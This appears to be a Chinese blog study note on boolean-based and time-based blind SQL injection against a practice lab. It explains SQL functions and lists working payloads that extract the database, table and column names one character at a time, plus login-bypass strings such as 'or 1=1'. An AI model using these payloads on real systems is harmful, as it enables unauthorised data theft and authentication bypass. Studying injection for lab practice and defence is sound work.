布尔型盲注
length() 函数 返回字符串的长度
?id=1' and (length(database()))=8 -- qwe
substr() 截取字符串 (语法:SUBSTR(str,pos,len);)
?id=1' and (ascii(substr(database(),1,1)))=115-- qwe 返回正常,说明数据库名称第一位是s
?id=1' and (ascii(substr(database(),2,1)))=101-- qwe 返回正常,说明数据库名称第二位是e
security
ascii() 返回字符的ascii码 [将字符变为数字wei]
?id=1' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)))=101-- qwe 如果返回正常,说明数据库表名的第一个的第一位是e
users
and (ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1)))=105-- qwe 如果返回正常,说明emails表中的列名称第一位是i
时间型
sleep() 将程序挂起一段时间n为n秒
if(expr1,expr2,expr3) 判断语句 如果第一个语句正确就执行第二个语句如果错误执行第三个语句
?id=1' and if (length(database())=8,sleep(5),1) -- qwe
?id=1' and if ((ascii(substr(database(),1,1))=115),sleep(5),1) -- qwe 延时,说明数据库名称第一位是s
?id=1' and if ((ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101),sleep(5),1) -- qwe 延时,说明数据库表名的第一个的第一位是e
?id=1' and if ((ascii(substr((select column_name from information_schema.columns where table_name='emails' limit 0,1),1,1))=105),sleep(5),1) -- qwe 如果返回正常,说明emails表中的列名称第一位是i
admin ' or 1=1 # 万能密码
admin' and (length(database()))=8 #
admin') and (length(database()))=8 #
admin' and (length(database()))=8 #
admin' and if (length(database())=8,sleep(5),1) #
标签:传参,17,database,--,qwe,lab,substr,ascii,id From: https://www.cnblogs.com/sjzdest/p/16948629.html